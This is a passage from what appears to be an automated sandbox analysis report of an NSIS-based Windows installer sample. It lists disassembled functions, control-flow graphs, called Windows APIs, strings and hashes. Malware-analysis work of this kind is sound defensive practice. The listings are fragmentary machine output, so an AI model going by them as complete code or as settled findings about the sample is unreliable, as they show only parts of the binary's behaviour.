20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00405196
                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                                                                                                                                                                                                                          • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                                                                                                                                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                                                                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                                                                                                                                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 004052E7
                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000008), ref: 00405333
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                                                                                                                                                                                                                        • CreatePopupMenu.USER32 ref: 00405376
                                                                                                                                                                                                                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                                                                                                                                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                                                                                                                                                                                                                        • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                                                                                                                                                                                                                        • EmptyClipboard.USER32 ref: 00405411
                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                                                                                                                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                                                                                                                                                                                                                        • CloseClipboard.USER32 ref: 0040546E
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                        • String ID: @rD$New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                        • API String ID: 2110491804-2409696222
                                                                                                                                                                                                                                                                        • Opcode ID: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                                                                                                                                                                                                                        • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                                                                                                                                                                                                                                                        Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • #17.COMCTL32 ref: 004038A2
                                                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                                                                                                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                                                                                                                                                                                                                          • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                                                                                                          • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                                                                                                          • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                                                                                                        • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                                                                                                                                                                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                        • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                                                                                                                                                                                                                        • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                                                                                                                                                                                                                        • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                                                                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                                                                                                                                                                                                                        • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                                                                                                                                                                                                                        • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00403AF1
                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                                                                                                                                                                                                                        • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                                                                                                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                        • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                                                                                                                                                                                                                        • API String ID: 2435955865-239407132
                                                                                                                                                                                                                                                                        • Opcode ID: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                                                                                                                                                                                                                        • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
                                                                                                                                                                                                                                                                        Function 00406805 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 212stringCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 587 406805-406810 588 406812-406821 587->588 589 406823-406837 587->589 588->589 590 406839-406846 589->590 591 40684f-406855 589->591 590->591 594 406848-40684b 590->594 592 406a81-406a8a 591->592 593 40685b-40685c 591->593 596 406a95-406a96 592->596 597 406a8c-406a90 call 406009 592->597 595 40685d-40686a 593->595 594->591 598 406870-406880 595->598 599 406a7f-406a80 595->599 597->596 601 406886-406889 598->601 602 406a5a 598->602 599->592 603 406a5d 601->603 604 40688f-4068cd 601->604 602->603 605 406a6d-406a70 603->605 606 406a5f-406a6b 603->606 607 4068d3-4068de GetVersion 604->607 608 4069ed-4069f6 604->608 611 406a73-406a79 605->611 606->611 612 4068e0-4068e8 607->612 613 4068fc 607->613 609 4069f8-4069fb 608->609 610 406a2f-406a38 608->610 616 406a0b-406a1a call 406009 609->616 617 4069fd-406a09 call 405f51 609->617 614 406a46-406a58 lstrlenW 610->614 615 406a3a-406a41 call 406805 610->615 611->595 611->599 612->613 618 4068ea-4068ee 612->618 619 406903-40690a 613->619 614->611 615->614 628 406a1f-406a25 616->628 617->628 618->613 622 4068f0-4068f4 618->622 624 40690c-40690e 619->624 625 40690f-406911 619->625 622->613 627 4068f6-4068fa 622->627 624->625 629 406913-406939 call 405ed3 625->629 630 40694d-406950 625->630 627->619 628->614 634 406a27-406a2d call 406038 628->634 640 4069d9-4069dd 629->640 641 40693f-406948 call 406805 629->641 632 406960-406963 630->632 633 406952-40695e GetSystemDirectoryW 630->633 637 406965-406973 GetWindowsDirectoryW 632->637 638 4069cf-4069d1 632->638 636 4069d3-4069d7 633->636 634->614 636->634 636->640 637->638 638->636 642 406975-40697f 638->642 640->634 645 4069df-4069eb lstrcatW 640->645 641->636 646 406981-406984 642->646 647 406999-4069af SHGetSpecialFolderLocation 642->647 645->634 646->647 649 406986-40698d 646->649 650 4069b1-4069c8 SHGetPathFromIDListW CoTaskMemFree 647->650 651 4069ca-4069cc 647->651 652 406995-406997 649->652 650->636 650->651 651->638 652->636 652->647
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(: Completed,00002004), ref: 00406958
                                                                                                                                                                                                                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(: Completed,00002004), ref: 0040696B
                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(: Completed,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                        • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                        • API String ID: 3581403547-2549942501
                                                                                                                                                                                                                                                                        • Opcode ID: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                                                                                                                                                                                                                        • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                                                                                                                                                                                                                        Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 886 4074bb-4074c0 887 4074c2-4074ef 886->887 888 40752f-407547 886->888 890 4074f1-4074f4 887->890 891 4074f6-4074fa 887->891 889 407aeb-407aff 888->889 895 407b01-407b17 889->895 896 407b19-407b2c 889->896 892 407506-407509 890->892 893 407502 891->893 894 4074fc-407500 891->894 897 407527-40752a 892->897 898 40750b-407514 892->898 893->892 894->892 899 407b33-407b3a 895->899 896->899 902 4076f6-407713 897->902 903 407516 898->903 904 407519-407525 898->904 900 407b61-407c68 899->900 901 407b3c-407b40 899->901 917 407350 900->917 918 407cec 900->918 906 407b46-407b5e 901->906 907 407ccd-407cd4 901->907 909 407715-407729 902->909 910 40772b-40773e 902->910 903->904 905 407589-4075b6 904->905 913 4075d2-4075ec 905->913 914 4075b8-4075d0 905->914 906->900 911 407cdd-407cea 907->911 915 407741-40774b 909->915 910->915 916 407cef-407cf6 911->916 919 4075f0-4075fa 913->919 914->919 920 40774d 915->920 921 4076ee-4076f4 915->921 922 407357-40735b 917->922 923 40749b-4074b6 917->923 924 40746d-407471 917->924 925 4073ff-407403 917->925 918->916 928 407600 919->928 929 407571-407577 919->929 930 407845-4078a1 920->930 931 4076c9-4076cd 920->931 921->902 927 407692-40769c 921->927 922->911 932 407361-40736e 922->932 923->889 937 407c76-407c7d 924->937 938 407477-40748b 924->938 943 407409-407420 925->943 944 407c6d-407c74 925->944 933 4076a2-4076c4 927->933 934 407c9a-407ca1 927->934 946 407556-40756e 928->946 947 407c7f-407c86 928->947 935 40762a-407630 929->935 936 40757d-407583 929->936 930->889 939 407c91-407c98 931->939 940 4076d3-4076eb 931->940 932->918 948 407374-4073ba 932->948 933->930 934->911 949 40768e 935->949 950 407632-40764f 935->950 936->905 936->949 937->911 945 40748e-407496 938->945 939->911 940->921 951 407423-407427 943->951 944->911 945->924 955 407498 945->955 946->929 947->911 953 4073e2-4073e4 948->953 954 4073bc-4073c0 948->954 949->927 956 407651-407665 950->956 957 407667-40767a 950->957 951->925 952 407429-40742f 951->952 959 407431-407438 952->959 960 407459-40746b 952->960 963 4073f5-4073fd 953->963 964 4073e6-4073f3 953->964 961 4073c2-4073c5 GlobalFree 954->961 962 4073cb-4073d9 GlobalAlloc 954->962 955->923 958 40767d-407687 956->958 957->958 958->935 965 407689 958->965 966 407443-407453 GlobalAlloc 959->966 967 40743a-40743d GlobalFree 959->967 960->945 961->962 962->918 968 4073df 962->968 963->951 964->963 964->964 970 407c88-407c8f 965->970 971 40760f-407627 965->971 966->918 966->960 967->966 968->953 970->911 971->935
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                                                                                                                                                        • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                                                                                                                                                                                                                        Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 310444273-0
                                                                                                                                                                                                                                                                        • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                                                                                                                                                        • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                                                                                                                                                                                                                        Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
